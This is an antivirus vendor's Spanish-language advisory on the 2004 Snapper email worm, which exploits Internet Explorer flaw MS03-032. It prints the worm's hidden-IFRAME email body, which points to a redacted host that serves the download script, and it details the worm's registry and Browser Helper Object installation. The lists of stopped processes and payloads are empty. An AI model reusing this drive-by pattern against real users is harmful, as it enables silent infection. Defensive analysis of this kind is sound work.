SNAPPER, nocivo gusano de Correo se auto-ejecuta aprovechando grave vulnerabilidad de Internet Explorer.   

© Jorge Machado  Lima-Perú

W32/Snapper@mm, I.worm.snapper@mm

Snapper es un gusano reportado el 25 de Marzo del 2004, de propagación masiva a través de mensajes de correo sin ningún archivo Anexado ya que explota la vulnerabilidad Object Data Remove Execution de las versiones 5.0, 5.5 y 6.0 del Internet Explorer, ampliamente difundida en el Boletín MS03-032 de Microsoft.

Esta vulnerabilidad permite que apenas se abra el mensaje de correo el gusano se conecte a un enlace en Internet y descargue un Script y un archivo .DLL que son instalados automáticamente en el sistema. 

Infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003

El mensaje tiene las siguientes características:

Emplea la técnica Email spoofing, que disfraza las verdaderas direcciones de los Remitentes.
Remitente: [dirección_falsa]
Asunto: Re:
Contenido, es una codificación HTML que simula ser un mensaje en blanco:

<HTML><BODY><IFRAME src="http://[omitido]/banner.htm"  style='display:none'></IFRAME></HTML></BODY>

(Nota: por razones de seguridad omitimos el URL)

Los procedimientos de este gusano son sumamente complejos:

El Script revisa la versión de Internet Explorer y en caso sean la 5.0, 5.5 o 6.0 el gusano saca provecho de esta vulnerabilidad y ejecuta desde ese mismo URL el Visual Basic Script htmlhelp.cgi, el mismo que libera una porción de código binario denominado Ieload.dll en la carpeta de Instalación de Windows y la ejecuta.

El código binario es un archivo .DLL de 8 KB y que tiene 2 funciones: InstallDLL, que ejecuta la instalación y el  MessageHandler que se encarga de la distribución masiva de mensajes de correo.

El Script activa la función InstallDLL y borra el archivo DLL del directorio %Windir% y al activarse se auto-copia al directorio %Windir% y a la carpeta %System% con el nombre de Ieload.dll registrándose a sí mismo como Objeto de Ayuda del Navegador (Browser Helper Object). El gusano crea un ID de "clase" en la siguiente llave de registro:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]

%Windir% es una variable que corresponde a C:\Windows en Windows 95/98/Me/XP/Server 2003 y C:\Winnt en Windows NT\2000.

%System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003.

La próxima vez que se re-inicia el sistema detiene los siguientes procesos:

Crea y/o actualiza los valores de la siguiente llave de registro:

[HKEY_CURRENT_CONFIGURATION\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"TimerTicks"
"PopupsLoaded"

Luego de estos procedimientos el gusano abre una conexión hacia una dirección en la web diferente a la que tenía los archivos Banner.htm y el DLL del gusano y se reporta como instalado. 

El gusano extrae información del SMTP (Simple Mail Transfer Protocol) del sistema infectado, tales como cuentas, direcciones de correo y nombres de usuarios de la Libreta de Direcciones de Windows WAB (Windows Address Book), la lee y envía el mensaje a todos los buzones de correo.

Ejecuta la rutina MessageHandler para el envío de mensajes. 

El parche para esta vulnerabilidad puede ser descargado de:

http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx

Sus payloads son los siguientes:

PER ANTIVIRUS® versión 8.5 y 8.6 con registro de virus al 25 de Marzo del 2004 detecta y elimina eficientemente este gusano. 

Ir al menú anterior

Regresar al Portal de PER SYSTEMS